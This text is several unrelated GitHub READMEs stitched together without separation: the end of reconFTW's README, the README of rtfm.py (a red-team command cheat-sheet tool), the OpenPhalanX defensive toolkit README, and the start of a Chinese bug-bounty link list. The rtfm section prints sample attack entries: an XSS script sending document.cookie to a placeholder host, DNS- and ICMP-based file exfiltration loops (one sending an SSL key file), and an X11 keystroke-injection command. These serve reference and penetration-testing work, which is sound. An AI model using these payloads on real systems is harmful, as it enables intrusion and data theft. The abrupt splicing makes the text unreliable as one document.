as a new remote: `git remote add upstream https://github.com/six2dez/reconftw` (`upstream` is an example) * Update upstream's repo: `git fetch upstream` * Rebase current branch with the official one: `git rebase upstream/main master` ### Main commands: * Upload changes to your personal repo: `git add . && git commit -m "Data upload" && git push origin master` * Update tool anytime: `git fetch upstream && git rebase upstream/main master` ## How to contribute: If you want to contribute to this project you can do it in multiple ways: - Submitting an [issue](https://github.com/six2dez/reconftw/issues/new/choose) because you have found a bug or you have any suggestion or request. - Making a Pull Request from [dev](https://github.com/six2dez/reconftw/tree/dev) branch because you want to improve the code or add something to the script. ## Need help? :information_source: - Take a look at the [wiki](https://github.com/six2dez/reconftw/wiki) section. - Check [FAQ](https://github.com/six2dez/reconftw/wiki/7.-FAQs) for commonly asked questions. - Ask for help in the [Telegram group](https://t.me/joinchat/TO_R8NYFhhbmI5co) ## You can support this work buying me a coffee: [<img src="https://cdn.buymeacoffee.com/buttons/v2/default-green.png">](https://www.buymeacoffee.com/six2dez) # Sponsors ❤️ **This section shows the current financial sponsors of this project** [<img src="https://pbs.twimg.com/profile_images/1360304248534282240/MomOFi40_400x400.jpg" width="100" height=auto>](https://github.com/0xtavian) # Thanks :pray: * Thank you for lending a helping hand towards the development of the project! - [Spyse](https://spyse.com/) - [Networksdb](https://networksdb.io/) - [Intelx](https://intelx.io/) - [BinaryEdge](https://www.binaryedge.io/) - [Censys](https://censys.io/) - [CIRCL](https://www.circl.lu/) - [Whoxy](https://www.whoxy.com/) # Disclaimer Usage of this program for attacking targets without consent is illegal. It is the user's responsibility to obey all applicable laws. The developer assumes no liability and is not responsible for any misuse or damage caused by this program. Please use responsibly. The material contained in this repository is licensed under GNU GPLv3.
# What is it? RTFM is a great and useful book, BUT a bit pointless when you have to transcribe it, so this little program will aim to be the spiritual successor to it. I would recommend picking up a copy of the book from Amazon, it is pretty handy to have! # Quick Start ``` Download, Update, Look for something! $ chmod +x rtfm.py $ ./rtfm.py -u $ ./rtfm.py -e 'Something' ``` # Usage ``` $ rtfm.py -h Usage: rtfm.py [OPTIONS] For when you just cant remember the syntax, you should just RTFM Options: --version show program's version number and exit -e SA, --everything=SA -h, --help show this help message and exit --delete=DELETE Delete specified ID -t TAG, --tag=TAG Specify one or more tags to look for (a, b, c) -c CMD, --cmd=CMD Specify a command to search (ls) -R REMARK, --remark=REMARK Search the comments feilds -r REFER, --reference=REFER Search for the reference [reference] -a AUTHOR, --author=AUTHOR Search for author -A DATE, --added-on=DATE Search by date, useful for when you want to commit back! -p PRINTER, --print=PRINTER Print Types : P(retty) p(astable) w(iki) h(tml) d(ump) -i INSERT, --insert=INSERT Insert c(ommand) | t(ags) | r(eferances) | (E)verything -D DUMP, --dump=DUMP Just Dump infomration about t(ags)|c(commands)|r(eferances)a(ll) -d, --debug Display verbose processing details (default: False) -u, --update Check for updates (default: false) -v Shows the current version number and the current DB hash and exits Example: rtfm.py -c rtfm -t linux -R help -r git -pP -d ``` Its pretty much a simple search program, nothing to fancy, examples include: # Searching the DB Searching the DB is handled through the following switches: e, t, c, R, r, a and, A. When you are just browsing for a command, you will want to use e as this looks at the command, comment, and referances all at the same time, useful if you know a bit about something such as x11: ``` $ ./rtfm.py -e x11 -pP +----------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ | Added By Innes | Cmd ID : 82 | +----------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ | Command | command="[cmd]";echo -n xdotool key " "; echo -n $command| sed 's# #€#g' | sed -e 's/\(.\)/\1 /g' | sed 's#/#slash#g' | sed 's#@#at#g'| sed 's#€#space#g' | sed 's#-#minus#g'|sed | | | 's#>#greater#g'| sed 's#+#plus#g' | sed 's#"#quotedbl#g' | sed 's#~#asciitilde#g' | sed 's#\.#period#g' | sed 's#_#underscore#g'; echo KP_Enter | | | | | Comment | Abuse open x11 : Think open term add user add key ;) | | Tags | linux | | | bash | | | interesting | | Date added | 2018-02-11 | | References | https://necurity.co.uk | | | https://ubuntuforums.org/archive/index.php/t-1970619.html | +----------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +----------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+ | Added By Innes | Cmd ID : 272 | +----------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+ | Command | xwd -display [victim] :0 -root -out /tmp/[victim].xpm;xwd -display ip :0 -root -out /tmp/[victim].xpm; convert /tmp/[victim]; xpm -resize 1280x1024 /tmp/[victim].jpg | | | | | Comment | take a screenshot from a open X11 and convert it to a jpg | | Tags | linux | | | bash | | | scanning | | | pivoting | | Date added | 2018-02-11 | | References | http://unix.stackexchange.com/questions/44821/how-do-i-screencap-another-xorg-display | +----------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +----------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ | Added By Innes | Cmd ID : 481 | +----------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ | Command | "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\ | | | x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5 | | | f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\ | | | x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xb | | | e\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\ | | | xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" | | | | | Comment | Bad Char's block, re-send removing bad ones | | Tags | buffer overflow | | Date added | 2018-02-11 | | References | https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/ | | | https://en.wikibooks.org/wiki/Metasploit/WritingWindowsExploit#Dealing_with_badchars | +----------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ ``` Any other time, one of t'other flags for other things; -c is search for a command. Use this when you know what command you want to look for, but can't quite remember the syntax. For example, if you want to quickly look up the syntax for a common sqlmap command. Useful for jumping straight to collections of common flags or one liners: ``` 19:54:root:rtfm: ./rtfm.py -pP -c 'sqlmap' +----------------+--------------------------------------------------------------------------------------------------+ | Added By @yght | Cmd ID : 162 | +----------------+--------------------------------------------------------------------------------------------------+ | Command | /opt/sqlmap/sqlmap.py --exclude-sysdbs --eta --is-dba --current-user --current-db --hostname -o | | | -r sql1.txt | | | | | Comment | SQLmap generic command | | Tags | sql injection | | Date added | 2017-06-19 | | References | https://github.com/sqlmapproject/sqlmap/wiki/Usage | +----------------+--------------------------------------------------------------------------------------------------+ ``` -t is search for a tag, tags are groups of similar commands, for example, XSS payloads. Use this when wanting a more generic search such as around flaws or around generic Windows commands: ``` 19:54:root:rtfm: ./rtfm.py -pP -t xss +----------------+------------------------------------------------------------------------------------+ | Added By Innes | Cmd ID : 35 | +----------------+------------------------------------------------------------------------------------+ | Command | <script>i = new XMLHttpRequest(); i.open('GET', '[dest]' + document.cookie, true); | | | i.send();</script> | | | | | Comment | Grab the cookie | | Tags | web application | | | XSS | | | cookies | | Date added | 2017-06-19 | | References | https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet | | | https://excess-xss.com/ | +----------------+------------------------------------------------------------------------------------+ <snip> ``` All the Tags known about can be shown through -Dt, Currently a few typos that will be fixed in version 0.9.9: ``` $ rtfm.py -Dt | linux | | bash | | text manipulation | | cisco | | networking | | loop | | pivoting | | files | | passwords | | enumeration | | user information | | interesting | | scanning | | hp | | brute | | http | | web application | | XSS | | cookies | | metasploit | | certificates | | stealth | | smb | | MitM | | dns | | package management | | reverse shells | | Windows | | perl | | python | | php | | ruby | | sql injection | | mysql | | shell | | mssql | | Oracle | | users | | wireless | | wifi | | configuration | | av evasion | | powershell | | memory | | impacket | | filesystem | | IIS | | process management | | privilege escalation | | remote command shell | | hashes | | recon | | cracking | | nessus | | subnets | | packet capture | | reference | | web address | | java | | solaris | | forensics | | ldap | | Anti Virus | | GIT | | interesting | | Cloud | | RDP | | shells | | encryption | | Troll | | buffer overflow | | mona | | interseting | | brute force | | Apple | | encoding | | ascii | | web app | | Cyber Essentials | | tools | | code execution | | jsp | ``` The next one you will want is -R, this is for searching for a 'remark' (aka comment, didn't want two c flags), this is to search the comments field and is more along the lines of searching for techniques or generic terms such as 'X11' or 'exfil': ``` +----------------+------------------------------------------------------------------------------------+ | Added By Innes | Cmd ID : 384 | +----------------+------------------------------------------------------------------------------------+ | Command | for line in `base64 -w 62 [file]`; do host $line.[hostname]; done | | | | | Comment | exfil file through DNS, may want to encrypt, also assuming you have a short domain | | Tags | linux | | | bash | | | loop | | | interesting | | Date added | 2017-06-19 | | References | https://www.amazon.co.uk/Rtfm-Red-Team-Field-Manual/dp/1494295504 | +----------------+------------------------------------------------------------------------------------+ +----------------+--------------------------------------------------------------------------------------------------+ | Added By Innes | Cmd ID : 386 | +----------------+--------------------------------------------------------------------------------------------------+ | Command | ping -p 11010101010101010101010101010199 -c 1 -M do 127.0.0.1 -s 32; for line in `base64 | | | sslfile.key | xxd -p -c 14`; do line2=`echo "11 $line 99" |tr -d ' '`; ping -p $line2 -c 1 -M do | | | 127.0.0.1 -s 32; done; ping -p 11101010101010101010101010101099 -c 1 -M do 127.0.0.1 -s 32 | | | | | Comment | Exfil over icmp | | Tags | linux | | | networking | | | loop | | | interesting | | Date added | 2017-06-19 | | References | https://www.amazon.co.uk/Rtfm-Red-Team-Field-Manual/dp/1494295504 | +----------------+--------------------------------------------------------------------------------------------------+ +----------------+-----------------------------------------------------------------------------------------------+ | Added By Innes | Cmd ID : 496 | +----------------+-----------------------------------------------------------------------------------------------+ | Command | for line in $(tshark -r [pcap] -T fields -e data | uniq | grep -v | | | "......................................................" | sed s/.*11/11/g | grep "11.*99" | | | | sed s/11// | sed s/99$// | tr -d '\n' | sed s/0101010101010101010101010101/'\n'/g |sed | | | s/010101010101010101010101010//g); do echo $line | xxd -r -p | base64 -d;echo | | | +++++++++++++++++++; done | | | | | Comment | Convert exfil ICMP back to files from pcap | | Tags | linux | | | networking | | | loop | | Date added | 2017-06-19 | | References | https://ask.wireshark.org/questions/15374/dump-raw-packet-data-field-only | +----------------+-----------------------------------------------------------------------------------------------+ ``` These next two are aimed for when you wish to commit back, and wouldn't be normally used: -a is to search by author, for example, show things you have added: `./rtfm.py -a innes` -A is 'Added on date', this can be one of yyyy-mm-dd, or now/today, most usefully for dumping out commands you have added to commit back to the git! ``` rtfm.py -A now ++++++++++++++++++++++++++++++ Command ID : 469 Command : b Comment : b Tags : b Date Added : 2017-05-14 Added By : b References __________ b ++++++++++++++++++++++++++++++ rtfm.py -A 2017-05-14 ++++++++++++++++++++++++++++++ Command ID : 469 Command : b Comment : b Tags : b Date Added : 2017-05-14 Added By : b References __________ b ++++++++++++++++++++++++++++++ ``` All of these search flags can be combinded to create a very specfic search should you wish, shown here with debugging on: ``` rtfm.py -c rtfm -a innes -t linux -R help -A 2017-05-10 -d [DEBUG]: Options Set: {'insert': None, 'remark': 'help', 'printer': None, 'dump': None, 'author': 'innes', 'cmd': 'rtfm', 'update': None, 'debug': True, 'tag': 'linux', 'date': '2017-05-10', 'delete': None, 'refer': None} [DEBUG]: S: SELECT c.cmdid, c.cmd, c.cmnt, c.date, c.author, group_concat(DISTINCT tc.tag), group_concat(DISTINCT ref) FROM tblcommand c JOIN tbltagmap tm ON tm.cmdid = c.cmdid JOIN tbltagcontent tc ON tc.tagid = tm.tagid JOIN tblrefmap rm ON rm.cmdid = c.cmdid JOIN tblrefcontent rc on rc.id = rm.refid WHERE c.cmd LIKE ? AND c.cmnt LIKE ? AND c.author LIKE ? AND c.date = ? GROUP BY c.cmdid HAVING group_concat(tc.tag) like ? [DEBUG]: W: ['%rtfm%', '%help%', '%innes%', '2017-05-10', '%linux%'] [DEBUG]: This Returned : [(1, 'rtfm.py -c [command] -t [tag],[tag] -C [comment] -p P', 'Helpception, search for a command with two tags and a comment', '2017-05-10', 'Innes', 'linux', 'https://github.com/leostat/rtfm,https://necurity.co.uk/osprog/2017-02-27-RTFM-Pythonized/index.html')] ++++++++++++++++++++++++++++++ Command ID : 1 Command : rtfm.py -c [command] -t [tag],[tag] -C [comment] -p P Comment : Helpception, search for a command with two tags and a comment Tags : linux Date Added : 2017-05-10 Added By : Innes References __________ https://github.com/leostat/rtfm https://necurity.co.uk/osprog/2017-02-27-RTFM-Pythonized/index.html ++++++++++++++++++++++++++++++ ``` # Updating your database RTFM implements a simple text file format to pull in updates to the database, these are shared VIA git, and implement a simple sha check to make sure they have not been corrupt during download. The updates called by the command are 'safe' in the form they won't write over your DB, should you git pull, it probably will overwrite your DB. If you are git cloning, you can move your database to '/etc/rtfm/snips.db' to protect your database file. ``` ./rtfm.py -u [WARNING]: No DB, please run rtfm -u [OK]: This may appear to hang. Run with debug to get more info [OK]: Program version information: [OK]: Your up to date : 0.9.8 Added A way of fixing typo's in the database Added program version checking Couple of code fixes DATE 1 +++++++++++++++++++++++++++ [OK]: Added Rows :1 [OK]: Added a new tag and a tagmap [OK]: Added a new Ref and a refmap [OK]: Added a new Ref and a refmap [OK]: Added Rows :1 [OK]: Added tags [OK]: Added a new tag and a tagmap [OK]: Added a new tag and a tagmap [OK]: Added a new Ref and a refmap [OK]: Added a new Ref and a refmap [OK]: Added Refs [OK]: Hopefully added lots of new commands [OK]: Parsed Line of update [OK]: Hopefully fixed lots of commands [OK]: Update complete ``` The update process also now drags in errata for the local DB allowing me a centralised way of neatly fixing the typos which have filtered into the DB. These are set through https://raw.githubusercontent.com/leostat/rtfm/master/updates/errata.txt. This allows things to be 'fixed' without needing to remove anything from the database. # Inserting and committing back Like all good cheatsheets, it is possible to add your own content to the database. This is managed through the -i segment of the program. When adding commands you must add them with comments, references, and tags. Else at the moment, they will not be returned from the DB. Minor bug really. This is done by adding all commands, along with their tags and references at once through using -iE, Insert everything: ``` 9:41:root:rtfm: ./rtfm.py -iE Enter your command : セ=ア[ミ=ウ],ハ=++ミ+ウ,ヘ=ホ[ミ+ハ],ア[ヘ+=ホ[ウ]+(ホ.ホ+ホ)[ウ]+ネ[ハ]+ヌ+セ+ア[ミ]+ヘ+ヌ+ホ[ウ]+セ][ヘ](ネ[ウ]+ネ[ミ]+ア[ハ]+セ+ヌ+"(ウ)")() Enter you comment : Script alert(1) using Katakana Enter Author : Innes Enter a tag (blank for end) : xss Enter a tag (blank for end) : web application Enter a tag (blank for end) : Enter a reference (blank for end) : https://github.com/aemkei/katakana.js Enter a reference (blank for end) : [OK]: Added Rows :1 [OK]: Added tags [OK]: Added tags [OK]: Added a new Ref and a refmap Enter your command : ^C Cancelled. ``` After committing to your local database I would be extremely grateful if you would open a pull request so that I am able to continue to add to the database. This is really easy, and done through the use of an output format 'pd' (print dump). The easiest way is by searching for commands added by yourself on today, then opening a git pull request, for the above example: ``` 19:43:root:rtfm: ./rtfm.py -a Innes -A now -pd セ=ア[ミ=ウ],ハ=++ミ+ウ,ヘ=ホ[ミ+ハ],ア[ヘ+=ホ[ウ]+(ホ.ホ+ホ)[ウ]+ネ[ハ]+ヌ+セ+ア[ミ]+ヘ+ヌ+ホ[ウ]+セ][ヘ](ネ[ウ]+ネ[ミ]+ア[ハ]+セ+ヌ+"(ウ)")() Script alert(1) using Katakana Innes EOC web application XSS EOT https://github.com/aemkei/katakana.js EOR ``` The above is the correct format for the updates, so you can add a file and I can either merge into one large update file, or keep it as a separate file! # Output Formats There is also a number of output options, such as copy any paste, pretty, wiki and update: ``` 23:15:root:snips: ./rtfm.py -c rtfm -p p ++++++++++++++++++++++++++++++ RTFM helpception ++++++++++++++++++++++++++++++ 23:15:root:snips: ./rtfm.py -c rtfm -p P +-------------+-------------+ | Command ID | 0 | +-------------+-------------+ | Command | RTFM | | | | | Comment | helpception | | Tags | Linux | | Date added | 2017-01-30 | +-------------+-------------+ 23:15:root:snips: ./rtfm.py -c rtfm -p w = Helpception, search for a command with two tags and a comment = rtfm.py -c [command] -t [tag],[tag] -C [comment] -p P linux https://github.com/leostat/rtfm ``` The update format is to make it easy to open pull requests for new commands! ``` rtfm.py -pd -c rtfm rtfm.py -c [command] -t [tag],[tag] -C [comment] -p P Helpception, search for a command with two tags and a comment Innes EOC linux EOT https://github.com/leostat/rtfm https://necurity.co.uk/osprog/2017-02-27-RTFM-Pythonized/index.html EOR ``` # Older way Should you wish to add say lots of commands at once, then worry about tags and references later you could do call RTFM with '-i c', using an empty response to stop processing commands: ``` $ rtfm.py -i c Enter your command : Your Command Enter you comment : Your Comment Enter Author : Your Name Enter your command : Command Two Enter you comment : Comment Two Enter Author : Your Name Enter your command : Enter you comment : Enter Author : [OK]: Added Rows : 2 [OK]: New Top ID : 491 | Number of CMD's Added : 2 ``` Next, add the required tags into the inserted with either '-i t', which adds tags to a single command, or '-i ta' which adds tags to all commands missing tags: ``` $ rtfm.py -i t What CMD are we adding tags too? : 491 Enter a tag (blank for none) : Test Enter a tag (blank for none) : Second Tag Enter a tag (blank for none) : [OK]: Added tags [OK]: Added a new tag and a tagmap ``` Similarly , you now have to add referances to the commands you have just added, '-i r', ``` $ rtfm.py -i r What CmdID are we adding refs to? : 491 Enter a reference (blank for non) : http://bing.com Enter a reference (blank for non) : [OK]: Added a new Ref and a refmap ``` There is also a '-i ta' which adds tags to all commands which are missing them, this was used for the DB seeding more than anything! ``` $ rtfm: ./rtfm.py -i ta [OK]: This tags everything without tags, mainly for DB init [OK]: Enter blank line to commit changes [WARNING]: Number left :22 [OK]: Command ID : 467 [OK]: Command : Test Command [OK]: Comment : My comment [OK]: v These are known tags | linux | | bash | | text manipulation | | cisco | | networking | | loop | | pivoting | | files | | passwords | | enumeration | | user information | | interesting | | scanning | | hp | | brute | | http | | web application | | XSS | | cookies | | metasploit | | certificates | | stealth | | smb | | MitM | | dns | | package management | | reverse shells | | Windows | | perl | | python | | php | | ruby | | sql injection | | mysql | | shell | | mssql | | Oracle | | users | | wireless | | wifi | | configuration | | av evasion | | powershell | | memory | | impacket | | filesystem | | IIS | | process management | | privilege escalation | | remote command shell | | hashes | | recon | | cracking | | nessus | | subnets | | packet capture | | reference | | web address | | java | | solaris | | forensics | | ldap | | Anti Virus | | GIT | | interesting | | Cloud | | RDP | | shells | | encyption | | Test | | Second Tag | == == ONE TAG A LINE == == Enter a tag (blank for non) : ``` # Deleting content This is simple enough, 'tis just using: `rtfm.py --delete 1` # Debugging Throughout the entire program, I have tried to add 'debug' calls '-d', these show you what the SQL is doing, what is being passed around. # Version 0.9.9 TODO * Central way of adding, removing , tags * Python three compat (See push) * Fix the darn typos in the python program # Version 1.0.0 TODO * Add a template system * Add a spawn shell system # Version 2 * Coming way in the future * Better text support * nicer updating * Python 3 # The TODO list * The 'important' functionality is present, but still lots of work to do * Changes are happening on the DB, which means it may 'break' from time to time, just do a git pull to fix ## Fixes: * Probably should use prepared statements: local so don't care * Check for dupe tags * Central tag updates ## Pipeline: * Template engine(autofill [user] : A user = innes, pass = password, attacker = 1.1.1.1, victim = 2.2.2.2 * Make code more sane and betterize the layout ## Future: * Cool Thing mode * Fix the typos # Credits The people that deserve the credits will be in the reference table of the DB. They are the ones doing the work! # Thanks Thanks in no particular order :) : ``` @VC : Fixing many a bug! @Rezkon : Suggesting new features and making the layout more sane @David : Being the beta tester and finding all the bugs! @Matthew S : Berating me into making the DB so much better and putting up with the n00b db questions @ECSC : Allowing me to publish! Go check them out : https://ecsc.co.uk @Fabien : 'Just run FSCK in dry run mode' . . . ;D ```
# OpenPhalanX: No one stands alone OpenPhalanX is a comprehensive toolkit designed to secure remote systems. Whether you're an IT professional seeking to automate system tasks, or a cybersecurity specialist handling incident response, OpenPhalanX offers an array of features to streamline your operations. This project is primarily written in PowerShell and I believe this is possibly the most beginner friendly language to work with. I hope it helps everyone feel comfortable digging into the code to understand how it works and how you might modify it to fit any of your needs. ## Table of Contents - [Installation](#installation) - [API Keys Configuration](#api-keys-configuration) - [Features](#features) - [Usage](#usage) - [Resources](#resources) - [Core Components & Tools](#core-components--tools) - [Command Analysis](#command-analysis) - [Process Analysis](#process-analysis) - [Service Analysis](#service-analysis) - [Tasks Analysis](#tasks-analysis) - [WMI Analysis](#wmi-analysis) - [General Persistence](#general-persistence) - [Prefetch and Execution Analysis](#prefetch-and-execution-analysis) - [PowerShell History Analysis](#powershell-history-analysis) - [Network Traffic Analysis](#network-traffic-analysis) - [Network Share Analysis](#network-share-analysis) - [Browser History Analysis](#browser-history-analysis) - [File Analysis](#file-analysis) - [USN Journal Analysis](#usn-journal-analysis) - [Magic Number Analysis](#magic-number-analysis) - [General Resources](#general-resources) - [Contribute](#contribute) - [Contact](#contact) - [License](#license) ## Installation To install OpenPhalanX on a Windows host, you will need to execute a PowerShell script called "Deploy_Phalanx_Formation.ps1". Follow the steps below to install using Visual Studio Code (VSCode): 1. Clone the OpenPhalanX repository from GitHub to your local machine. 2. Open Visual Studio Code. 3. Navigate to the OpenPhalanX project directory using the File Explorer in VSCode. 4. Locate the script "Deploy_Phalanx_Formation.ps1" using the File Explorer and click on it to open. 5. With "Deploy_Phalanx_Formation.ps1" open in the editor, go to the Terminal menu and select "Run Active File". This will execute the installation script in the Terminal window. You will need the requisite permissions within AD to force a password reset, disable, or enable an account. You also need to have admin rights and powershell remoting must be enabled on the remote host. You will also need the ActiveDirectory powershell module. This module is part of RSAT and can be enabled by follow the instructions here - https://learn.microsoft.com/en-US/troubleshoot/windows-server/system-management-components/remote-server-administration-tools ## API Keys Configuration OpenPhalanX utilizes several APIs to facilitate its operations, each of which require API keys. These keys should be added to the locations specified in the `API_Keys&Extensions.txt` file. This repository has a directory titled "Integrations" which contains additional file submission python helpers and button click code. I do not have an api key for all of these integrations and the code you select may not have been tested. Comment out any api queries you want to exclude from the prompts for Get Intel and Sandbox URL/Retrieve Report. Add any api's you wish to query as needed(email mwhatter@openphalanx for assistance). File submissions to sandboxes should be done with reverence to the potentially sensitive data within the sample being detonated. The default file sandbox integration with OpenPhalanX is Anomali's API with specification to use their integration with VMRay. I highly recommend using either a private account with one of the provided integration examples or standing up a private instance of Cuckoo. You are responsible for complying with any API provider's usage requirements for your situation. ## Features OpenPhalanX offers an array of features designed to facilitate remote system management, monitoring, and security. For a comprehensive list of features, please refer to the "?" button within Defending_Off_the_Land.ps1. For tooltips, hover over each button. ## Usage After installation, you can run the `Defending_Off_the_Land.ps1` script through VSCode. Here's how you can do this: 1. Open Visual Studio Code. 2. Navigate to the OpenPhalanX project directory using the File Explorer in VSCode. 3. Locate the script "Defending_Off_the_Land.ps1" using the File Explorer and click on it to open. 4. With "Defending_Off_the_Land.ps1" open in the editor, go to the Terminal menu and select "Run Active File". This will execute the script in the Terminal window. Follow the instructions provided within the script for each feature. Example workflow: Enter remote computer name; run RapidTriage; run WinEventalyzer; run Intelligazer; investigate indicators; run ProcAsso; investigate execution chain. ## Resources This project integrates or is inspired by a number of other projects and resources. Here are some that may help you better understand the mechanics, provide further insight or could be useful for other related purposes: ### Core Components & Tools - [OpenPhalanX Repository](https://github.com/mwhatter/OpenPhalanX) - [Visual Studio Code](https://code.visualstudio.com/) - [Python Official Site](https://www.python.org/) - [Olaf Hartong's Sysmon configuration](https://github.com/olafhartong/sysmon-modular) - [DeepBlueCLI](https://github.com/sans-blue-team/DeepBlueCLI) - [Hayabusa](https://github.com/bigbangforensics/Hayabusa) ### Command Analysis - [Command Analysis Datasource](https://attack.mitre.org/datasources/DS0017/) - [Command Line Analysis](https://redcanary.com/blog/process-command-line/) ### Process Analysis - [Process Analysis Datasource](https://attack.mitre.org/datasources/DS0009/) - [Windows Processes Memory Forensics](https://esmyl.medium.com/windows-processes-memory-forensics-dfir-f5cf878d7b2a) ### Service Analysis - [Service Analysis Datasource](https://attack.mitre.org/datasources/DS0019/) - [Windows Services Analysis](https://forensafe.com/blogs/windowsservices.html) - [Finding Hidden Windows Services](https://www.sans.org/blog/defense-spotlight-finding-hidden-windows-services/) ### Tasks Analysis - [Tasks Analysis Datasource](https://attack.mitre.org/datasources/DS0003/) - [Behavior Analysis Task Scheduler](https://www.kadircirik.com/behavior-analysis-task-scheduler/) - [Scheduled Task Analysis](https://redcanary.com/threat-detection-report/techniques/scheduled-task/) ### WMI Analysis - [WMI Analysis Datasource](https://attack.mitre.org/datasources/DS0005/) - [WMI Forensics Writeup](https://www.hackthebox.com/blog/perseverance-biz-ctf-2022-forensics-writeup) ### General Persistence - [Persistence Cheatsheet](https://hackmag.com/security/persistence-cheatsheet/) ### Prefetch and Execution Analysis - [TrustedSec Prefetch Blog](https://www.trustedsec.com/blog/prefetch-the-little-snitch-that-tells-on-you/) - [Prefetch Forensics](https://isc.sans.edu/diary/Forensic+Value+of+Prefetch/29168/) - [Windows Forensics Execution](https://frsecure.com/blog/windows-forensics-execution/) ### PowerShell History Analysis - [PowerShell Command History Forensics](https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics) ### Network Traffic Analysis - [Network Traffic Analysis Datasource](https://attack.mitre.org/datasources/DS0029/) - [Network Traffic Analysis for IR Connection Analysis](https://resources.infosecinstitute.com/topic/network-traffic-analysis-for-ir-connection-analysis/) ### Network Share Analysis - [Network Share Analysis Datasource](https://attack.mitre.org/datasources/DS0033/) ### Browser History Analysis - [Browser Artifacts Forensics](https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts) ### File Analysis - [File Analysis Datasource](https://attack.mitre.org/datasources/DS0022/) - [Metadata Forensics](https://www.ironhack.com/us/en/blog/metadata-forensics-when-files-can-speak-and-reveal-the-truth) ### USN Journal Analysis - [USN Journal Extraction for Efficient Investigation](https://www.otorio.com/resources/usnjrnl-extraction-for-efficient-investigation/) - [Advanced USN Journal Forensics](https://blog.haboob.sa/blog/advanced-usn-journal-forensics) ### Magic Number Analysis - [What is Magic Number](https://www.ibm.com/support/pages/what-magic-number) - [Core of Digital Forensics - Magic Numbers](https://medium.com/asecuritysite-when-bob-met-alice/the-core-of-digital-forensics-magic-numbers-fd3e6d7a225) - [MagnumDB](https://www.magnumdb.com/) ### General Resources - [Everything Cheatsheet](https://www.jaiminton.com/cheatsheet/DFIR/) - [Defensive TTP Map](https://d3fend.mitre.org/) ## Contribute Contributions are always welcome! If you're interested in enhancing OpenPhalanX, please see our [contributing guidelines](CONTRIBUTING.md). Special thanks to creators of other projects that help make OpenPhalanX what it is: - [Eric Zimmerman](https://github.com/sponsors/EricZimmerman) - [Yamato Security](https://github.com/Yamato-Security) - [Eric Conrad](https://www.ericconrad.com/) ## Contact For any questions, feedback, or suggestions, please reach out to [email protected]. ## License OpenPhalanX is licensed under GPL-3.0 License. Refer to the [LICENSE](LICENSE) file for more details.
# SRC-experience 工欲善其事,必先利其器 ~~最近收集到的一些src挖掘奇技淫巧,然后还有一些国外新技术的学习网站分享给大家。~~ 2021.10.20: 时隔两年更新下文章。 **Bug Bounty trick website** <https://www.bugbountynotes.com/training> <https://pentester.land/newsletter/2019/02/12/the-5-hacking-newsletter-40.html> <https://www.openbugbounty.org/> **hackerone-reports** [hackerone-reports](https://github.com/reddelexc/hackerone-reports) [bug-bounty-reference 按漏洞性质分类的漏洞赏金记录列表](https://github.com/ngalongc/bug-bounty-reference) [BUG BOUNTY HUNTING](https://medium.com/bugbountywriteup/bug-bounty-hunting-methodology-toolkit-tips-tricks-blogs-ef6542301c65) [bounty-targets-data 赏金目标数据](https://github.com/arkadiyt/bounty-targets-data) [6000多份HackerOne漏洞公开报告](https://www.uedbox.com/post/65763/) [https://github.com/ngalongc/bug-bounty-reference](https://github.com/ngalongc/bug-bounty-reference) [Awesome-Bugbounty-Writeups](https://github.com/devanshbatham/Awesome-Bugbounty-Writeups) [https://github.com/w181496/Web-CTF-Cheatsheet](https://github.com/w181496/Web-CTF-Cheatsheet) [collection-of-bug-bounty-tip-will-be-updated-daily](https://medium.com/@vignesh4303/collection-of-bug-bounty-tip-will-be-updated-daily-605911cfa248) **Web-CTF-Cheatsheet** ```java https://github.com/w181496/Web-CTF-Cheatsheet https://github.com/harsh-bothra/learn365/ https://github.com/carlospolop/hacktricks ``` **Penetration** ```java BugBountyHunting Search Engine https://www.bugbountyhunting.com/ Bug Bounty Collection https://github.com/ngalongc/bug-bounty-reference https://github.com/djadmin/awesome-bug-bounty https://github.com/Muhammd/awesome-bug-bounty https://github.com/djadmin/awesome-bug-bounty https://github.com/dwisiswant0/awesome-oneliner-bugbounty 